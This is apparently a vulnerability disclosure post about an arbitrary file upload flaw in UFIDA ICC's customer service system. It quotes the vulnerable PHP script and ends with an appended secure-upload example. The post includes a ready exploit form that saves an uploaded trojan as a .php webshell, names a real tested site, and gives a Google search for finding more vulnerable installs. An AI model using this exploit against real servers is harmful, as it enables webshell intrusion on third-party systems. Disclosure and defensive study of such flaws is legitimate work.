Another File Upload Vulnerability in the customer service system of the UFIDA ICC website
I looked at the previous vulnerability, http://www.bkjia.com/article/201204/425159.html, and found that the vulnerability still exists.
I don't know whether the upgrade has not been completed yet or there is some other problem, but the vulnerability is present on multiple websites.
/home/ecccs/web/5107/upload/screenImagesSave.php (the related upload scripts have it too)
<?php
/**
 * screenImagesSave.php
 *
 */
require_once('../global.inc.php');
// Get request.
$ft = intval($_REQUEST['ft']);
/*
chdir($CONFIG["canned_file_tmp"]);
exec("rm -rf *");
*/
$date = date("Ymd");
$dest = $CONFIG->basePath . 'data/files/' . $date . "/";
if (!is_dir($dest)) mkdir($dest, 0777);
// The name the file is saved under comes straight from the filename GET parameter.
$filename = paramsFmt(urldecode($_GET["filename"]));
// The extension check looks only at the client-supplied name of the uploaded file.
$nameExt = strtolower($COMMON->getFileExtName($_FILES['file']['name']));
$unallowedType = array('php', 'jsp', 'asp', 'sh', 'pl', 'js', 'jar', 'jad', 'class', 'java');
if (in_array($nameExt, $unallowedType)) {
    if ($ft == '1') {
        echo 'pe';
    } else if ($ft == '2') {
        echo 'fe';
    }
    exit;
}
/*
if (empty($filename)) $filename = date("Ymdhms") . "_noname.file";
echo $date . "/" . $filename;
*/
// $filename was never checked against $unallowedType.
$filenameNew = $dest . $filename;
if (empty($_FILES["file"]['error'])) {
    move_uploaded_file($_FILES["file"]["tmp_name"], $filenameNew);
}
if (file_exists($filenameNew)) {
    echo(urlencode($CONFIG->baseUrl . 'data/files/' . $date . "/" . $filename));
    @chmod($filenameNew, 0444);
} else {
    if ($ft == '1') {
        echo 'pe';
    } else if ($ft == '2') {
        echo 'fe';
    }
}
?>
Did you notice filename? The type of the uploaded file is verified, but the file is saved under the name given in the filename GET parameter. Dizzying...
<form id="QuickSearch" name="QuickSearch" enctype="multipart/form-data" method="post" action="http://xxx.xxxx.com/5107/upload/screenImagesSave.php?filename=xx.php">
<input type="file" name="file">
<input type="submit" name="QuickSearchBtn" value="Upload">
</form>
Upload a jpg trojan file, and the trojan is saved successfully as xx.php.
Tested on:
http://icc.5107.cn/
and sites found through Google search,
and so on.
Search:
https://www.google.com/search?q=inurl:/5107/upload.php&hl=en&noj=1&prmd=imvns&ei=e12mt4ug?ji=7ofnhaw&start=10&sa=N&filter=0&biw=1366&bih=618
Solution:
You should know!
Author: Jannock
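
One way to close the hole described above, as an added example that is not from the original post or the vendor's code: the stored name is generated on the server and its extension comes from an allow-list keyed on the detected content type, so neither the filename parameter nor the client's file name reaches the path. The function names, the image-only policy and the /var/data/icc-uploads directory are assumptions.

```php
<?php
// Added example, not the vendor's code. Assumes an image-only upload policy.
const ALLOWED = [                 // detected MIME type => extension we store
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// Build the stored name from the file's content alone; null means "reject".
function storedNameFor(string $tmpPath): ?string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!is_string($mime) || !array_key_exists($mime, ALLOWED)) {
        return null;
    }
    // Random name: $_GET['filename'] and $_FILES['file']['name'] never reach the path.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
}

// Returns the relative path of the saved file, or null if the upload is refused.
function saveUpload(array $file, string $baseDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $name = storedNameFor($file['tmp_name']);
    if ($name === null) {
        return null;
    }
    $day = date('Ymd');
    $dir = rtrim($baseDir, '/') . "/$day/";
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        return null;
    }
    if (!move_uploaded_file($file['tmp_name'], $dir . $name)) {
        return null;
    }
    chmod($dir . $name, 0440);    // read-only, no execute bit
    return "$day/$name";
}

if (isset($_FILES['file'])) {
    // Hypothetical directory: outside the web root, or with script execution disabled.
    $saved = saveUpload($_FILES['file'], '/var/data/icc-uploads');
    if ($saved === null) { http_response_code(400); exit('rejected'); }
    echo urlencode($saved);
}
```

A file that carries valid image magic bytes plus script code still passes the content check, which is why the example also fixes the extension and stores the file where the web server does not execute scripts.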